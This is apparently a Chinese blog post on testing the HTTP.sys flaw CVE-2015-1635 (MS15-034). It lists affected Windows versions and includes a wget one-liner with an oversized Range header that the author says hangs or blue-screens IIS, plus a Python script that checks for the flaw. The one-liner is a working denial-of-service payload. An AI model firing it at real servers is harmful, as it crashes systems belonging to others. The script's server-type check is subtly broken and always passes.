CVE-2015-1635，MS15-034 漏洞测试

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。

成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

https://technet.microsoft.com/zh-cn/library/security/MS15-034

漏洞出来了POC，测试如下：

影响版本：

windows 2008 R2

windows sever 2012

windows 7

windows 8 8.1

安装IIS6.0以上。 (IIS version > 6.0)

HTTP.sys不懂其他地方用不用，所以暂时只了解影响WEB服务器。

测试POC:

系统必假死或者蓝屏：

wget --header="Range: bytes=18-18446744073709551615" http://192.168.200.49/welcome.png

 https://github.com/yanyueoo7/TestOne/blob/master/CVE-2015-1635.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#date 2015/04/20
#The IIS Vul （CVE-2015-1635，MS15-034）Check Script.
#HTTP.sys Remote Code Execute.

import sys
import requests

def main():
	ip_Str = sys.argv[1]
	Check_CVE_2015_1635(ip_Str)

def Check_CVE_2015_1635(Ip_Str):
	if Ip_Str:
		Server_Tag = ['Microsoft-HTTP','Microsoft-IIS']
		Tmp_Req_Url = str(''.join(['http://',Ip_Str]))
		Request_Tmp = requests.get(Tmp_Req_Url)
		remote_server = Request_Tmp.headers[ 'server']
		if (tmp_tag in remote_server for tmp_tag in Server_Tag):
			print("[+] Web Service Is " + remote_server)
			MS15_034_Execute(Tmp_Req_Url)
		else:
			print("[+] Web Service Is Not IIS\n[+] May Be " + remote_server)

def MS15_034_Execute(domain):
	print("[+] Start Checking...")
	Req_headers = {'Host': 'stuff','Range': 'bytes=0-18446744073709551615'}
	Request = requests.get(domain, headers=Req_headers)
	if 'Requested Range Not Satisfiable' in Request.content:
		print("[+] The HTTP.sys remote code execution vulnerability Is Exists!")
	elif 'The request has an invalid header name' in Request.content:
		print("[+] The vulnerability has been fixed!")
	else:
		print("[+] The IIS service was unable to display the vulnerability exists, the need for manual testing!")

if __name__ == '__main__':
	main()